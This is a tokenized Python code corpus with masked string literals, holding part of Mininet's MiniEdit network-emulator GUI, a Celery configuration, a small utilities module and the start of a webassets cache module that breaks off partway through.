widgetToItem : <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . widgetToItem [ widget ] ) <EOL> if '<STR_LIT>' in tags : <EOL> opts = self . switchOpts [ name ] <EOL> switchClass = customOvs <EOL> switchParms = { } <EOL> if '<STR_LIT>' in opts : <EOL> switchParms [ '<STR_LIT>' ] = int ( opts [ '<STR_LIT>' ] ) <EOL> if '<STR_LIT>' in opts : <EOL> switchParms [ '<STR_LIT>' ] = opts [ '<STR_LIT>' ] <EOL> if opts [ '<STR_LIT>' ] == '<STR_LIT:default>' : <EOL> if self . appPrefs [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> switchClass = IVSSwitch <EOL> elif self . 
appPrefs [ '<STR_LIT>' ] == '<STR_LIT:user>' : <EOL> switchClass = CustomUserSwitch <EOL> elif self . appPrefs [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> switchParms [ '<STR_LIT>' ] = True <EOL> switchClass = CustomUserSwitch <EOL> else : <EOL> switchClass = customOvs <EOL> elif opts [ '<STR_LIT>' ] == '<STR_LIT:user>' : <EOL> switchClass = CustomUserSwitch <EOL> elif opts [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> switchClass = CustomUserSwitch <EOL> switchParms [ '<STR_LIT>' ] = True <EOL> elif opts [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> switchClass = IVSSwitch <EOL> else : <EOL> switchClass = customOvs <EOL> if switchClass == customOvs : <EOL> self . openFlowVersions = [ ] <EOL> if self . appPrefs [ '<STR_LIT>' ] [ '<STR_LIT>' ] == '<STR_LIT:1>' : <EOL> self . openFlowVersions . append ( '<STR_LIT>' ) <EOL> if self . appPrefs [ '<STR_LIT>' ] [ '<STR_LIT>' ] == '<STR_LIT:1>' : <EOL> self . openFlowVersions . append ( '<STR_LIT>' ) <EOL> if self . appPrefs [ '<STR_LIT>' ] [ '<STR_LIT>' ] == '<STR_LIT:1>' : <EOL> self . openFlowVersions . append ( '<STR_LIT>' ) <EOL> if self . appPrefs [ '<STR_LIT>' ] [ '<STR_LIT>' ] == '<STR_LIT:1>' : <EOL> self . openFlowVersions . append ( '<STR_LIT>' ) <EOL> protoList = "<STR_LIT:U+002C>" . join ( self . openFlowVersions ) <EOL> switchParms [ '<STR_LIT>' ] = protoList <EOL> newSwitch = net . addSwitch ( name , cls = switchClass , ** switchParms ) <EOL> if switchClass == CustomUserSwitch : <EOL> if '<STR_LIT>' in opts : <EOL> if len ( opts [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> newSwitch . setSwitchIP ( opts [ '<STR_LIT>' ] ) <EOL> if switchClass == customOvs : <EOL> if '<STR_LIT>' in opts : <EOL> if len ( opts [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> newSwitch . setSwitchIP ( opts [ '<STR_LIT>' ] ) <EOL> if '<STR_LIT>' in opts : <EOL> for extInterface in opts [ '<STR_LIT>' ] : <EOL> if self . checkIntf ( extInterface ) : <EOL> Intf ( extInterface , node = newSwitch ) <EOL> elif '<STR_LIT>' in tags : <EOL> newSwitch = net . 
addSwitch ( name , cls = LegacySwitch ) <EOL> elif '<STR_LIT>' in tags : <EOL> newSwitch = net . addHost ( name , cls = LegacyRouter ) <EOL> elif '<STR_LIT>' in tags : <EOL> opts = self . hostOpts [ name ] <EOL> ip = None <EOL> defaultRoute = None <EOL> if '<STR_LIT>' in opts and len ( opts [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> defaultRoute = '<STR_LIT>' + opts [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in opts and len ( opts [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> ip = opts [ '<STR_LIT>' ] <EOL> else : <EOL> nodeNum = self . hostOpts [ name ] [ '<STR_LIT>' ] <EOL> ipBaseNum , prefixLen = netParse ( self . appPrefs [ '<STR_LIT>' ] ) <EOL> ip = ipAdd ( i = nodeNum , prefixLen = prefixLen , ipBaseNum = ipBaseNum ) <EOL> if '<STR_LIT>' in opts or '<STR_LIT>' in opts : <EOL> if '<STR_LIT>' in opts : <EOL> hostCls = partial ( CPULimitedHost , <EOL> privateDirs = opts [ '<STR_LIT>' ] ) <EOL> else : <EOL> hostCls = CPULimitedHost <EOL> else : <EOL> if '<STR_LIT>' in opts : <EOL> hostCls = partial ( Host , <EOL> privateDirs = opts [ '<STR_LIT>' ] ) <EOL> else : <EOL> hostCls = Host <EOL> print hostCls <EOL> newHost = net . addHost ( name , <EOL> cls = hostCls , <EOL> ip = ip , <EOL> defaultRoute = defaultRoute <EOL> ) <EOL> if '<STR_LIT>' in opts : <EOL> newHost . setCPUs ( cores = opts [ '<STR_LIT>' ] ) <EOL> if '<STR_LIT>' in opts : <EOL> newHost . setCPUFrac ( f = opts [ '<STR_LIT>' ] , sched = opts [ '<STR_LIT>' ] ) <EOL> if '<STR_LIT>' in opts : <EOL> for extInterface in opts [ '<STR_LIT>' ] : <EOL> if self . checkIntf ( extInterface ) : <EOL> Intf ( extInterface , node = newHost ) <EOL> if '<STR_LIT>' in opts : <EOL> if len ( opts [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> print '<STR_LIT>' <EOL> self . pathCheck ( '<STR_LIT>' , moduleName = '<STR_LIT>' ) <EOL> moduleDeps ( add = '<STR_LIT>' ) <EOL> elif '<STR_LIT>' in tags : <EOL> opts = self . 
controllers [ name ] <EOL> controllerType = opts [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in opts : <EOL> controllerProtocol = opts [ '<STR_LIT>' ] <EOL> else : <EOL> controllerProtocol = '<STR_LIT>' <EOL> opts [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> controllerIP = opts [ '<STR_LIT>' ] <EOL> controllerPort = opts [ '<STR_LIT>' ] <EOL> print '<STR_LIT>' + controllerType <EOL> if controllerType == '<STR_LIT>' : <EOL> net . addController ( name = name , <EOL> controller = RemoteController , <EOL> ip = controllerIP , <EOL> protocol = controllerProtocol , <EOL> port = controllerPort ) <EOL> elif controllerType == '<STR_LIT>' : <EOL> net . addController ( name = name , <EOL> controller = InbandController , <EOL> ip = controllerIP , <EOL> protocol = controllerProtocol , <EOL> port = controllerPort ) <EOL> elif controllerType == '<STR_LIT>' : <EOL> net . addController ( name = name , <EOL> controller = OVSController , <EOL> protocol = controllerProtocol , <EOL> port = controllerPort ) <EOL> else : <EOL> net . addController ( name = name , <EOL> controller = Controller , <EOL> protocol = controllerProtocol , <EOL> port = controllerPort ) <EOL> else : <EOL> raise Exception ( "<STR_LIT>" + name ) <EOL> @ staticmethod <EOL> def pathCheck ( * args , ** kwargs ) : <EOL> "<STR_LIT>" <EOL> moduleName = kwargs . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> for arg in args : <EOL> if not quietRun ( '<STR_LIT>' + arg ) : <EOL> showerror ( title = "<STR_LIT>" , <EOL> message = '<STR_LIT>' % arg + <EOL> '<STR_LIT>' % moduleName + <EOL> '<STR_LIT>' ) <EOL> def buildLinks ( self , net ) : <EOL> print "<STR_LIT>" <EOL> for key , link in self . links . iteritems ( ) : <EOL> tags = self . canvas . gettags ( key ) <EOL> if '<STR_LIT:data>' in tags : <EOL> src = link [ '<STR_LIT:src>' ] <EOL> dst = link [ '<STR_LIT>' ] <EOL> linkopts = link [ '<STR_LIT>' ] <EOL> srcName , dstName = src [ '<STR_LIT:text>' ] , dst [ '<STR_LIT:text>' ] <EOL> srcNode , dstNode = net . nameToNode [ srcName ] , net . 
nameToNode [ dstName ] <EOL> if linkopts : <EOL> net . addLink ( srcNode , dstNode , cls = TCLink , ** linkopts ) <EOL> else : <EOL> net . addLink ( srcNode , dstNode ) <EOL> self . canvas . itemconfig ( key , dash = ( ) ) <EOL> def build ( self ) : <EOL> print "<STR_LIT>" <EOL> dpctl = None <EOL> if len ( self . appPrefs [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> dpctl = int ( self . appPrefs [ '<STR_LIT>' ] ) <EOL> net = Mininet ( topo = None , <EOL> listenPort = dpctl , <EOL> build = False , <EOL> ipBase = self . appPrefs [ '<STR_LIT>' ] ) <EOL> self . buildNodes ( net ) <EOL> self . buildLinks ( net ) <EOL> net . build ( ) <EOL> return net <EOL> def postStartSetup ( self ) : <EOL> for widget in self . widgetToItem : <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . widgetToItem [ widget ] ) <EOL> if '<STR_LIT>' in tags : <EOL> newHost = self . net . get ( name ) <EOL> opts = self . hostOpts [ name ] <EOL> if '<STR_LIT>' in opts : <EOL> for vlanInterface in opts [ '<STR_LIT>' ] : <EOL> print '<STR_LIT>' + vlanInterface [ <NUM_LIT:1> ] <EOL> newHost . cmdPrint ( '<STR_LIT>' + name + '<STR_LIT>' + vlanInterface [ <NUM_LIT:1> ] + '<STR_LIT:U+0020>' + vlanInterface [ <NUM_LIT:0> ] ) <EOL> if '<STR_LIT>' in opts : <EOL> newHost . cmdPrint ( opts [ '<STR_LIT>' ] ) <EOL> if '<STR_LIT>' in tags : <EOL> newNode = self . net . get ( name ) <EOL> opts = self . switchOpts [ name ] <EOL> if '<STR_LIT>' in opts : <EOL> newNode . cmdPrint ( opts [ '<STR_LIT>' ] ) <EOL> nflowValues = self . appPrefs [ '<STR_LIT>' ] <EOL> if len ( nflowValues [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> nflowEnabled = False <EOL> nflowSwitches = '<STR_LIT>' <EOL> for widget in self . widgetToItem : <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . widgetToItem [ widget ] ) <EOL> if '<STR_LIT>' in tags : <EOL> opts = self . 
switchOpts [ name ] <EOL> if '<STR_LIT>' in opts : <EOL> if opts [ '<STR_LIT>' ] == '<STR_LIT:1>' : <EOL> print name + '<STR_LIT>' <EOL> nflowSwitches = nflowSwitches + '<STR_LIT>' + name + '<STR_LIT>' <EOL> nflowEnabled = True <EOL> if nflowEnabled : <EOL> nflowCmd = '<STR_LIT>' + '<STR_LIT>' + nflowValues [ '<STR_LIT>' ] + '<STR_LIT>' + '<STR_LIT>' + nflowValues [ '<STR_LIT>' ] <EOL> if nflowValues [ '<STR_LIT>' ] == '<STR_LIT:1>' : <EOL> nflowCmd = nflowCmd + '<STR_LIT>' <EOL> else : <EOL> nflowCmd = nflowCmd + '<STR_LIT>' <EOL> print '<STR_LIT>' + nflowCmd + nflowSwitches <EOL> call ( nflowCmd + nflowSwitches , shell = True ) <EOL> else : <EOL> print '<STR_LIT>' <EOL> else : <EOL> print '<STR_LIT>' <EOL> sflowValues = self . appPrefs [ '<STR_LIT>' ] <EOL> if len ( sflowValues [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> sflowEnabled = False <EOL> sflowSwitches = '<STR_LIT>' <EOL> for widget in self . widgetToItem : <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . widgetToItem [ widget ] ) <EOL> if '<STR_LIT>' in tags : <EOL> opts = self . switchOpts [ name ] <EOL> if '<STR_LIT>' in opts : <EOL> if opts [ '<STR_LIT>' ] == '<STR_LIT:1>' : <EOL> print name + '<STR_LIT>' <EOL> sflowSwitches = sflowSwitches + '<STR_LIT>' + name + '<STR_LIT>' <EOL> sflowEnabled = True <EOL> if sflowEnabled : <EOL> sflowCmd = '<STR_LIT>' + '<STR_LIT>' + sflowValues [ '<STR_LIT>' ] + '<STR_LIT>' + '<STR_LIT>' + sflowValues [ '<STR_LIT>' ] + '<STR_LIT:U+0020>' + '<STR_LIT>' + sflowValues [ '<STR_LIT>' ] + '<STR_LIT:U+0020>' + '<STR_LIT>' + sflowValues [ '<STR_LIT>' ] <EOL> print '<STR_LIT>' + sflowCmd + sflowSwitches <EOL> call ( sflowCmd + sflowSwitches , shell = True ) <EOL> else : <EOL> print '<STR_LIT>' <EOL> else : <EOL> print '<STR_LIT>' <EOL> if self . appPrefs [ '<STR_LIT>' ] == '<STR_LIT:1>' : <EOL> info ( "<STR_LIT>" ) <EOL> CLI ( self . net ) <EOL> def start ( self ) : <EOL> "<STR_LIT>" <EOL> if self . net is None : <EOL> self . net = self . 
build ( ) <EOL> info ( '<STR_LIT>' % len ( self . net . controllers ) ) <EOL> for controller in self . net . controllers : <EOL> info ( str ( controller ) + '<STR_LIT:U+0020>' ) <EOL> controller . start ( ) <EOL> info ( '<STR_LIT:\n>' ) <EOL> info ( '<STR_LIT>' % len ( self . net . switches ) ) <EOL> for widget in self . widgetToItem : <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . widgetToItem [ widget ] ) <EOL> if '<STR_LIT>' in tags : <EOL> opts = self . switchOpts [ name ] <EOL> switchControllers = [ ] <EOL> for ctrl in opts [ '<STR_LIT>' ] : <EOL> switchControllers . append ( self . net . get ( ctrl ) ) <EOL> info ( name + '<STR_LIT:U+0020>' ) <EOL> self . net . get ( name ) . start ( switchControllers ) <EOL> if '<STR_LIT>' in tags : <EOL> self . net . get ( name ) . start ( [ ] ) <EOL> info ( name + '<STR_LIT:U+0020>' ) <EOL> info ( '<STR_LIT:\n>' ) <EOL> self . postStartSetup ( ) <EOL> def stop ( self ) : <EOL> "<STR_LIT>" <EOL> if self . net is not None : <EOL> for widget in self . widgetToItem : <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . widgetToItem [ widget ] ) <EOL> if '<STR_LIT>' in tags : <EOL> newHost = self . net . get ( name ) <EOL> opts = self . hostOpts [ name ] <EOL> if '<STR_LIT>' in opts : <EOL> newHost . cmdPrint ( opts [ '<STR_LIT>' ] ) <EOL> if '<STR_LIT>' in tags : <EOL> newNode = self . net . get ( name ) <EOL> opts = self . switchOpts [ name ] <EOL> if '<STR_LIT>' in opts : <EOL> newNode . cmdPrint ( opts [ '<STR_LIT>' ] ) <EOL> self . net . stop ( ) <EOL> cleanUpScreens ( ) <EOL> self . net = None <EOL> def do_linkPopup ( self , event ) : <EOL> if self . net is None : <EOL> try : <EOL> self . linkPopup . tk_popup ( event . x_root , event . y_root , <NUM_LIT:0> ) <EOL> finally : <EOL> self . linkPopup . grab_release ( ) <EOL> else : <EOL> try : <EOL> self . linkRunPopup . tk_popup ( event . x_root , event . 
y_root , <NUM_LIT:0> ) <EOL> finally : <EOL> self . linkRunPopup . grab_release ( ) <EOL> def do_controllerPopup ( self , event ) : <EOL> if self . net is None : <EOL> try : <EOL> self . controllerPopup . tk_popup ( event . x_root , event . y_root , <NUM_LIT:0> ) <EOL> finally : <EOL> self . controllerPopup . grab_release ( ) <EOL> def do_legacyRouterPopup ( self , event ) : <EOL> if self . net is not None : <EOL> try : <EOL> self . legacyRouterRunPopup . tk_popup ( event . x_root , event . y_root , <NUM_LIT:0> ) <EOL> finally : <EOL> self . legacyRouterRunPopup . grab_release ( ) <EOL> def do_hostPopup ( self , event ) : <EOL> if self . net is None : <EOL> try : <EOL> self . hostPopup . tk_popup ( event . x_root , event . y_root , <NUM_LIT:0> ) <EOL> finally : <EOL> self . hostPopup . grab_release ( ) <EOL> else : <EOL> try : <EOL> self . hostRunPopup . tk_popup ( event . x_root , event . y_root , <NUM_LIT:0> ) <EOL> finally : <EOL> self . hostRunPopup . grab_release ( ) <EOL> def do_legacySwitchPopup ( self , event ) : <EOL> if self . net is not None : <EOL> try : <EOL> self . switchRunPopup . tk_popup ( event . x_root , event . y_root , <NUM_LIT:0> ) <EOL> finally : <EOL> self . switchRunPopup . grab_release ( ) <EOL> def do_switchPopup ( self , event ) : <EOL> if self . net is None : <EOL> try : <EOL> self . switchPopup . tk_popup ( event . x_root , event . y_root , <NUM_LIT:0> ) <EOL> finally : <EOL> self . switchPopup . grab_release ( ) <EOL> else : <EOL> try : <EOL> self . switchRunPopup . tk_popup ( event . x_root , event . y_root , <NUM_LIT:0> ) <EOL> finally : <EOL> self . switchRunPopup . grab_release ( ) <EOL> def xterm ( self , _ignore = None ) : <EOL> "<STR_LIT>" <EOL> if ( self . selection is None or <EOL> self . net is None or <EOL> self . selection not in self . itemToWidget ) : <EOL> return <EOL> name = self . itemToWidget [ self . selection ] [ '<STR_LIT:text>' ] <EOL> if name not in self . net . 
nameToNode : <EOL> return <EOL> term = makeTerm ( self . net . nameToNode [ name ] , '<STR_LIT>' , term = self . appPrefs [ '<STR_LIT>' ] ) <EOL> if StrictVersion ( MININET_VERSION ) > StrictVersion ( '<STR_LIT>' ) : <EOL> self . net . terms += term <EOL> else : <EOL> self . net . terms . append ( term ) <EOL> def iperf ( self , _ignore = None ) : <EOL> "<STR_LIT>" <EOL> if ( self . selection is None or <EOL> self . net is None or <EOL> self . selection not in self . itemToWidget ) : <EOL> return <EOL> name = self . itemToWidget [ self . selection ] [ '<STR_LIT:text>' ] <EOL> if name not in self . net . nameToNode : <EOL> return <EOL> self . net . nameToNode [ name ] . cmd ( '<STR_LIT>' ) <EOL> def parseArgs ( self ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in sys . argv : <EOL> index = sys . argv . index ( '<STR_LIT>' ) <EOL> if len ( sys . argv ) > index + <NUM_LIT:1> : <EOL> filename = sys . argv [ index + <NUM_LIT:1> ] <EOL> self . parseCustomFile ( filename ) <EOL> else : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> desc = ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> usage = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> opts = OptionParser ( description = desc , usage = usage ) <EOL> addDictOption ( opts , TOPOS , TOPODEF , '<STR_LIT>' ) <EOL> addDictOption ( opts , LINKS , LINKDEF , '<STR_LIT>' ) <EOL> opts . add_option ( '<STR_LIT>' , type = '<STR_LIT:string>' , default = None , <EOL> help = '<STR_LIT>' + <EOL> '<STR_LIT:file>' ) <EOL> self . options , self . args = opts . parse_args ( ) <EOL> if self . args : <EOL> opts . print_help ( ) <EOL> exit ( ) <EOL> def setCustom ( self , name , value ) : <EOL> "<STR_LIT>" <EOL> if name in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> param = name . upper ( ) <EOL> globals ( ) [ param ] . update ( value ) <EOL> elif name == '<STR_LIT>' : <EOL> self . 
validate = value <EOL> else : <EOL> globals ( ) [ name ] = value <EOL> def parseCustomFile ( self , fileName ) : <EOL> "<STR_LIT>" <EOL> customs = { } <EOL> if os . path . isfile ( fileName ) : <EOL> execfile ( fileName , customs , customs ) <EOL> for name , val in customs . iteritems ( ) : <EOL> self . setCustom ( name , val ) <EOL> else : <EOL> raise Exception ( '<STR_LIT>' % fileName ) <EOL> def importTopo ( self ) : <EOL> print '<STR_LIT>' + self . options . topo <EOL> if self . options . topo == '<STR_LIT:none>' : <EOL> return <EOL> self . newTopology ( ) <EOL> topo = buildTopo ( TOPOS , self . options . topo ) <EOL> link = customClass ( LINKS , self . options . link ) <EOL> importNet = Mininet ( topo = topo , build = False , link = link ) <EOL> importNet . build ( ) <EOL> c = self . canvas <EOL> rowIncrement = <NUM_LIT:100> <EOL> currentY = <NUM_LIT:100> <EOL> print '<STR_LIT>' + str ( len ( importNet . controllers ) ) <EOL> for controller in importNet . controllers : <EOL> name = controller . name <EOL> x = self . controllerCount * <NUM_LIT:100> + <NUM_LIT:100> <EOL> self . addNode ( '<STR_LIT>' , self . controllerCount , <EOL> float ( x ) , float ( currentY ) , name = name ) <EOL> icon = self . findWidgetByName ( name ) <EOL> icon . bind ( '<STR_LIT>' , self . do_controllerPopup ) <EOL> ctrlr = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : name , <EOL> '<STR_LIT>' : controller . protocol , <EOL> '<STR_LIT>' : controller . ip , <EOL> '<STR_LIT>' : controller . port } <EOL> self . controllers [ name ] = ctrlr <EOL> currentY = currentY + rowIncrement <EOL> print '<STR_LIT>' + str ( len ( importNet . switches ) ) <EOL> columnCount = <NUM_LIT:0> <EOL> for switch in importNet . switches : <EOL> name = switch . name <EOL> self . switchOpts [ name ] = { } <EOL> self . switchOpts [ name ] [ '<STR_LIT>' ] = self . switchCount <EOL> self . switchOpts [ name ] [ '<STR_LIT>' ] = name <EOL> self . switchOpts [ name ] [ '<STR_LIT>' ] = '<STR_LIT:default>' <EOL> self . 
switchOpts [ name ] [ '<STR_LIT>' ] = [ ] <EOL> x = columnCount * <NUM_LIT:100> + <NUM_LIT:100> <EOL> self . addNode ( '<STR_LIT>' , self . switchCount , <EOL> float ( x ) , float ( currentY ) , name = name ) <EOL> icon = self . findWidgetByName ( name ) <EOL> icon . bind ( '<STR_LIT>' , self . do_switchPopup ) <EOL> for controller in importNet . controllers : <EOL> self . switchOpts [ name ] [ '<STR_LIT>' ] . append ( controller . name ) <EOL> dest = self . findWidgetByName ( controller . name ) <EOL> dx , dy = c . coords ( self . widgetToItem [ dest ] ) <EOL> self . link = c . create_line ( float ( x ) , <EOL> float ( currentY ) , <EOL> dx , <EOL> dy , <EOL> width = <NUM_LIT:4> , <EOL> fill = '<STR_LIT>' , <EOL> dash = ( <NUM_LIT:6> , <NUM_LIT:4> , <NUM_LIT:2> , <NUM_LIT:4> ) , <EOL> tag = '<STR_LIT>' ) <EOL> c . itemconfig ( self . link , tags = c . gettags ( self . link ) + ( '<STR_LIT>' , ) ) <EOL> self . addLink ( icon , dest , linktype = '<STR_LIT>' ) <EOL> self . createControlLinkBindings ( ) <EOL> self . link = self . linkWidget = None <EOL> if columnCount == <NUM_LIT:9> : <EOL> columnCount = <NUM_LIT:0> <EOL> currentY = currentY + rowIncrement <EOL> else : <EOL> columnCount = columnCount + <NUM_LIT:1> <EOL> currentY = currentY + rowIncrement <EOL> print '<STR_LIT>' + str ( len ( importNet . hosts ) ) <EOL> columnCount = <NUM_LIT:0> <EOL> for host in importNet . hosts : <EOL> name = host . name <EOL> self . hostOpts [ name ] = { '<STR_LIT>' : '<STR_LIT:host>' } <EOL> self . hostOpts [ name ] [ '<STR_LIT>' ] = self . hostCount <EOL> self . hostOpts [ name ] [ '<STR_LIT>' ] = name <EOL> self . hostOpts [ name ] [ '<STR_LIT>' ] = host . IP ( ) <EOL> x = columnCount * <NUM_LIT:100> + <NUM_LIT:100> <EOL> self . addNode ( '<STR_LIT>' , self . hostCount , <EOL> float ( x ) , float ( currentY ) , name = name ) <EOL> icon = self . findWidgetByName ( name ) <EOL> icon . bind ( '<STR_LIT>' , self . 
do_hostPopup ) <EOL> if columnCount == <NUM_LIT:9> : <EOL> columnCount = <NUM_LIT:0> <EOL> currentY = currentY + rowIncrement <EOL> else : <EOL> columnCount = columnCount + <NUM_LIT:1> <EOL> print '<STR_LIT>' + str ( len ( topo . links ( ) ) ) <EOL> for link in topo . links ( ) : <EOL> print str ( link ) <EOL> srcNode = link [ <NUM_LIT:0> ] <EOL> src = self . findWidgetByName ( srcNode ) <EOL> sx , sy = self . canvas . coords ( self . widgetToItem [ src ] ) <EOL> destNode = link [ <NUM_LIT:1> ] <EOL> dest = self . findWidgetByName ( destNode ) <EOL> dx , dy = self . canvas . coords ( self . widgetToItem [ dest ] ) <EOL> params = topo . linkInfo ( srcNode , destNode ) <EOL> print '<STR_LIT>' + str ( params ) <EOL> self . link = self . canvas . create_line ( sx , sy , dx , dy , width = <NUM_LIT:4> , <EOL> fill = '<STR_LIT>' , tag = '<STR_LIT>' ) <EOL> c . itemconfig ( self . link , tags = c . gettags ( self . link ) + ( '<STR_LIT:data>' , ) ) <EOL> self . addLink ( src , dest , linkopts = params ) <EOL> self . createDataLinkBindings ( ) <EOL> self . link = self . linkWidget = None <EOL> importNet . stop ( ) <EOL> def miniEditImages ( ) : <EOL> "<STR_LIT>" <EOL> return { <EOL> '<STR_LIT>' : BitmapImage ( <EOL> file = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : PhotoImage ( data = r"""<STR_LIT>""" ) , <EOL> '<STR_LIT>' : PhotoImage ( data = r"""<STR_LIT>""" ) , <EOL> '<STR_LIT>' : PhotoImage ( data = r"""<STR_LIT>""" ) , <EOL> '<STR_LIT>' : PhotoImage ( data = r"""<STR_LIT>""" ) , <EOL> '<STR_LIT>' : PhotoImage ( data = r"""<STR_LIT>""" ) , <EOL> '<STR_LIT>' : PhotoImage ( data = r"""<STR_LIT>""" ) , <EOL> '<STR_LIT>' : PhotoImage ( data = r"""<STR_LIT>""" ) <EOL> } <EOL> def addDictOption ( opts , choicesDict , default , name , helpStr = None ) : <EOL> """<STR_LIT>""" <EOL> if default not in choicesDict : <EOL> raise Exception ( '<STR_LIT>' % <EOL> ( default , name ) ) <EOL> if not helpStr : <EOL> helpStr = ( '<STR_LIT:|>' . join ( sorted ( choicesDict . 
keys ( ) ) ) + <EOL> '<STR_LIT>' ) <EOL> opts . add_option ( '<STR_LIT>' + name , <EOL> type = '<STR_LIT:string>' , <EOL> default = default , <EOL> help = helpStr ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> setLogLevel ( '<STR_LIT:info>' ) <EOL> app = MiniEdit ( ) <EOL> app . parseArgs ( ) <EOL> app . importTopo ( ) <EOL> app . mainloop ( ) </s>
<s> from celery import Celery <EOL> from mining . utils import conf <EOL> celery_app = Celery ( <EOL> '<STR_LIT>' , <EOL> broker = conf ( "<STR_LIT>" ) . get ( "<STR_LIT>" , '<STR_LIT>' ) , <EOL> backend = conf ( "<STR_LIT>" ) . get ( "<STR_LIT>" , '<STR_LIT>' ) , <EOL> include = [ '<STR_LIT>' ] ) <EOL> celery_app . conf . update ( ** conf ( "<STR_LIT>" ) . get ( "<STR_LIT>" , { } ) ) </s>
<s> import json <EOL> import re <EOL> import os <EOL> import ast <EOL> import unicodedata <EOL> import ConfigParser <EOL> from bson import ObjectId <EOL> from datetime import datetime <EOL> from bottle import request <EOL> from mining . settings import PROJECT_PATH <EOL> def slugfy ( text ) : <EOL> try : <EOL> slug = unicodedata . normalize ( "<STR_LIT>" , text ) . encode ( "<STR_LIT>" , "<STR_LIT:ignore>" ) <EOL> except : <EOL> slug = text <EOL> slug = re . sub ( r"<STR_LIT>" , "<STR_LIT:U+0020>" , slug ) <EOL> slug = "<STR_LIT:->" . join ( slug . lower ( ) . strip ( ) . split ( ) ) <EOL> if not slug : <EOL> return None <EOL> return slug <EOL> def conf ( section , ini = "<STR_LIT>" ) : <EOL> config = ConfigParser . ConfigParser ( ) <EOL> if os . path . isfile ( os . path . join ( PROJECT_PATH , ini ) ) : <EOL> config . read ( os . path . join ( PROJECT_PATH , ini ) ) <EOL> else : <EOL> config . read ( os . path . join ( PROJECT_PATH , "<STR_LIT>" ) ) <EOL> _dict = { } <EOL> options = config . options ( section ) <EOL> for option in options : <EOL> try : <EOL> _dict [ option ] = ast . literal_eval ( config . get ( section , option ) ) <EOL> except : <EOL> try : <EOL> _dict [ option ] = config . get ( section , option ) <EOL> except : <EOL> _dict [ option ] = None <EOL> return _dict <EOL> def log_it ( s , name = u"<STR_LIT>" ) : <EOL> with open ( "<STR_LIT>" . format ( name ) , "<STR_LIT:a>" ) as log : <EOL> msg = u"<STR_LIT>" . format ( datetime . now ( ) , s ) <EOL> log . write ( msg . encode ( '<STR_LIT:utf-8>' ) ) <EOL> def parse_dumps ( obj ) : <EOL> if isinstance ( obj , datetime ) : <EOL> return str ( obj . strftime ( "<STR_LIT>" ) ) <EOL> if isinstance ( obj , ObjectId ) : <EOL> return str ( obj ) <EOL> return json . JSONEncoder . default ( obj ) <EOL> def __from__ ( path ) : <EOL> try : <EOL> _import = path . split ( '<STR_LIT:.>' ) [ - <NUM_LIT:1> ] <EOL> _from = u"<STR_LIT:.>" . join ( path . 
split ( '<STR_LIT:.>' ) [ : - <NUM_LIT:1> ] ) <EOL> return getattr ( __import__ ( _from , fromlist = [ _import ] ) , _import ) <EOL> except TypeError : <EOL> return object <EOL> def query_field ( f ) : <EOL> ret = { } <EOL> value = request . GET . get ( f ) <EOL> if value : <EOL> s = f . split ( '<STR_LIT>' ) <EOL> ret [ '<STR_LIT:action>' ] = s [ <NUM_LIT:0> ] <EOL> ret [ '<STR_LIT>' ] = s [ <NUM_LIT:1> ] <EOL> ret [ '<STR_LIT>' ] = s [ <NUM_LIT:2> ] <EOL> ret [ '<STR_LIT:value>' ] = value <EOL> return ret </s>
<s> __version__ = "<STR_LIT>" </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> from os import path <EOL> import errno <EOL> import tempfile <EOL> import warnings <EOL> from webassets import six <EOL> from webassets . merge import BaseHunk <EOL> from webassets . filter import Filter , freezedicts <EOL> from webassets . utils import md5_constructor , pickle <EOL> import types <EOL> __all__ = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , ) <EOL> def make_hashable ( data ) : <EOL> """<STR_LIT>""" <EOL> return freezedicts ( data ) <EOL> def make_md5 ( * data ) : <EOL> """<STR_LIT>""" <EOL> def walk ( obj ) : <EOL> if isinstance ( obj , ( tuple , list , frozenset ) ) : <EOL> for item in obj : <EOL> for d in walk ( item ) : yield d <EOL> elif isinstance ( obj , ( dict ) ) : <EOL> for k in sorted ( obj . keys ( ) ) : <EOL> for d in walk ( k ) : yield d <EOL> for d in walk ( obj [ k ] ) : yield d <EOL> elif isinstance ( obj , BaseHunk ) : <EOL> yield obj . data ( ) . encode ( '<STR_LIT:utf-8>' ) <EOL> elif isinstance ( obj , int ) : <EOL> yield str ( obj ) . encode ( '<STR_LIT:utf-8>' ) <EOL> elif isinstance ( obj , six . text_type ) : <EOL> yield obj . encode ( '<STR_LIT:utf-8>' ) <EOL> elif isinstance ( obj , six . binary_type ) : <EOL> yield obj <EOL> elif hasattr ( obj , "<STR_LIT:id>" ) : <EOL> for i in walk ( obj . id ( ) ) : 